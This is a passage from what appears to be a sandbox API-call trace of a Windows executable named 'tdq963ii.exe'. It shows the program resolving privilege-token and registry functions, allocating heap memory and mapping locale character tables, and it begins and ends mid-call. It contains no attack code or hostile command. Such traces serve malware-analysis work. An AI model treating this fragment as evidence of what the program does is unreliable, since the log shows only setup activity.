lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0244.036] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0244.036] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0244.036] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0244.036] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0244.036] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0244.036] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0244.036] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0244.036] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0244.036] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0244.036] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0244.036] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0244.036] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0244.037] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0244.037] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0244.037] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0244.037] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0244.037] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0244.037] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0244.037] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0244.037] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0244.037] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0244.037] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0244.037] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0244.037] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0244.038] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0244.038] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0244.038] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0244.038] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0244.038] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0244.038] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0244.038] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0244.038] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0244.038] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0244.039] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0244.040] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x473b49c0, dwHighDateTime=0x1d68287)) [0244.040] GetCurrentThreadId () returned 0x7a0 [0244.040] GetCurrentProcessId () returned 0xa18 [0244.040] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=36437861580) returned 1 [0244.040] GetProcessHeap () returned 0x560000 [0244.040] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0244.040] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0244.040] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0244.040] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0244.040] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0244.040] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0244.041] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0244.041] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0244.041] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0244.041] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0244.041] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0244.041] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0244.041] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0244.041] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0244.041] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0244.041] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0244.041] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0244.042] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0244.042] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0244.042] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0244.042] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0244.042] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0244.043] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0244.043] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0244.043] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0244.043] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0244.043] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0244.043] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0244.043] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0244.043] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0244.043] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0244.043] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0244.043] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0244.044] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0244.174] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3bc) returned 0x577098 [0244.174] GetCurrentThreadId () returned 0x7a0 [0244.174] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x18) returned 0x577460 [0244.174] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x800) returned 0x577480 [0244.174] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x3d306287, hStdError=0x0)) [0244.174] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0244.174] GetFileType (hFile=0x3) returned 0x2 [0244.174] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0244.175] GetFileType (hFile=0x7) returned 0x2 [0244.175] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0244.175] GetFileType (hFile=0xb) returned 0x2 [0244.175] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0244.175] GetEnvironmentStringsW () returned 0x577c88* [0244.175] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0xb82) returned 0x578818 [0244.176] FreeEnvironmentStringsW (penv=0x577c88) returned 1 [0244.176] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x94) returned 0x577c88 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0xa0) returned 0x577d28 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3e) returned 0x574dc8 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x6c) returned 0x577dd0 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x6e) returned 0x577e48 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x78) returned 0x56f8f8 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x62) returned 0x577ec0 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2e) returned 0x577f30 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x48) returned 0x577f68 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x26) returned 0x577fb8 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x28) returned 0x577fe8 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1a) returned 0x576a68 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x4a) returned 0x578018 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x72) returned 0x56f978 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x30) returned 0x578070 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2e) returned 0x5780a8 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1c) returned 0x576a90 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0xd2) returned 0x5780e0 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x7c) returned 0x5781c0 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x36) returned 0x578248 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3a) returned 0x574e10 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x90) returned 0x578288 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x24) returned 0x578320 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x30) returned 0x578350 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x36) returned 0x578388 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x48) returned 0x5783c8 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x52) returned 0x578418 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3c) returned 0x574e58 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x18) returned 0x578478 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x82) returned 0x578498 [0244.176] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2e) returned 0x578528 [0244.177] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x1e) returned 0x576ab8 [0244.177] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2c) returned 0x578560 [0244.177] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x54) returned 0x578598 [0244.177] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x52) returned 0x5785f8 [0244.177] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x2a) returned 0x578658 [0244.177] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x3c) returned 0x574ea0 [0244.177] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x54) returned 0x578690 [0244.177] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x24) returned 0x5786f0 [0244.177] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x30) returned 0x578720 [0244.177] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x8c) returned 0x578758 [0244.177] HeapFree (in: hHeap=0x560000, dwFlags=0x0, lpMem=0x578818 | out: hHeap=0x560000) returned 1 [0244.177] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x8, Size=0x800) returned 0x5787f0 [0244.177] GetLastError () returned 0x0 [0244.177] SetLastError (dwErrCode=0x0) [0244.177] GetLastError () returned 0x0 [0244.178] SetLastError (dwErrCode=0x0) [0244.178] GetLastError () returned 0x0 [0244.178] SetLastError (dwErrCode=0x0) [0244.178] GetACP () returned 0x4e4 [0244.178] RtlAllocateHeap (HeapHandle=0x560000, Flags=0x0, Size=0x220) returned 0x578ff8 [0244.178] GetLastError () returned 0x0 [0244.178] SetLastError (dwErrCode=0x0) [0244.178] IsValidCodePage (CodePage=0x4e4) returned 1 [0244.178] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0244.178] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0244.178] GetLastError () returned 0x0 [0244.178] SetLastError (dwErrCode=0x0) [0244.178] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0244.178] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0244.178] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0244.178] GetLastError () returned 0x0 [0244.178] SetLastError (dwErrCode=0x0) [0244.178] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0244.178] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0244.178] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0244.178] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ") returned 256 [0244.178] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰š‹œ\x8dž\x8f\x90‘’“”•–—˜™š›œ\x9džÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿȀ", cchWideChar=256, lpMultiByteStr=0x18fca8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ\x17c0=äþ\x18", lpUsedDefaultChar=0x0) returned 256 [0244.178] GetLastError () returned 0x0 [0244.179] SetLastError (dwErrCode=0x0) [0244.179] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0244.179] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6f8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0244.179] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0244.179] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4e8, cchDest=256, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0244.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x18fba8, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f 